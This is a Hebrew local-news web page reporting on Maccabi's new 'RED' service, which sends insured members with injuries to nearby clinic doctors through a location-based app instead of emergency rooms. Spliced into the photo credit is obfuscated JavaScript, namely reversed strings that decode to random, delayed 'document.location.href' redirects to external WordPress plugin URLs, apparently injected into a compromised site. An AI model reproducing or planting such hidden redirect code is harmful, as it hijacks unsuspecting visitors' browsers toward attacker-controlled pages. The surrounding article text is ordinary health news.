fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

חדש במכבי: רפואה דחופה במרפאה הקרובה לבית

שירות חדש מאפשר למבוטחי הקופה לקבל טיפול מיידי ליד ביתם במקרה של פציעה או חבלה וחוסך מהם את הצורך לפנות למיון. איתור הרופא נעשה באמצעות אפליקציה ייעודית
פציעה
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

מכבי RED (ר"ד) הוא שירות חדש ומהפכני של מכבי שירותי בריאות, המאפשר לחברי הקופה לקבל טיפול קרוב לבית במקרה של פציעה או חבלה וחוסך מהם את הצורך ללכת למיון.
מאות אלפי ישראלים מגיעים מדי שנה אל חדרי המיון עם חתכים הדורשים תפירה, גוף זר בעין ושברים וממתינים בדרך כלל זמן רב לקבלת טיפול, כאשר לפי נתוני משרד הבריאות זמן ההמתנה הממוצע בבתי החולים עומד על כארבע שעות.
במהלך ראשון מסוגו בישראל, פרשה מכבי רשת של מאות רופאים ברחבי הארץ המעניקים טיפול במקרים דחופים אלה. בהמשך תתווסף גם רפואת נשים בהריון. לפי ההערכות, השירות צפוי להקל על עשרות אלפי מטופלים בשנה. בקריות יעניקו מענה לתושבי האזור 17 רופאים.
כל רופא RED יטפל במקרים שבתחום המומחיות שלו: רפואת משפחה, ילדים, נשים, עיניים, אף אוזן גרון, אורתופדיה ועוד. איתור הרופא המתאים והזמין מבוצע באפליקציה מבוססת מיקום שפותחה במיוחד בתוך אפליקציית מכבי. המטופל מגדיר מאיזו בעיה הוא סובל, והאפליקציה מאתרת עבורו את הרופא המתאים והקרוב אליו ביותר שיוכל לקבלו בין התורים.

אפליקציית מכבי ר"ד
אפליקציית מכבי ר"ד

ד"ר דמיטרי פיטרמן, מוביל מכבי RED במחוז צפון וסגן המנהל הרפואי של המחוז: "המטופלים מופתעים מאוד מהשירות הזה, שמאפשר להם מענה מיידי ליד הבית במקום לנסוע לחדר מיון ולחכות שם שעות. המטופלים שהזמינו תור מראש וממתינים לתורם מקבלים זאת בהבנה, כי זה ניכר שמישהו הזקוק לתפירה או לבעיה דחופה אחרת צריך עזרה מיידית. הם גם מבינים שמחר אלה יכולים להיות הם".
מבדיקה של כ-10,000 מקרים שטופלו עד כה במסגרת השירות החדש עולה, כי כ-80 אחוז מהמקרים היו בעלי הצדקה רפואית לטיפול במיון (על פי הקריטריונים שקבע משרד הבריאות). המשמעות: אלפי בני אדם נמנעו מהמתנה ארוכה ומייגעת בבתי החולים ומחשיפה לזיהומים רבים שנמצאים במיון.
רופאי מכבי RED פועלים בשעות העבודה של המרפאות בימי א׳-ה׳ בין השעות 18:00-08:00 ובימי שישי בין השעות 12:00-08:00. בנוסף, מכבי מפעילה מוקדי רפואה דחופה הפזורים ברחבי הארץ, כך שחברי מכבי מקבלים מענה למקרים דחופים לאורך רוב שעות היממה.

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות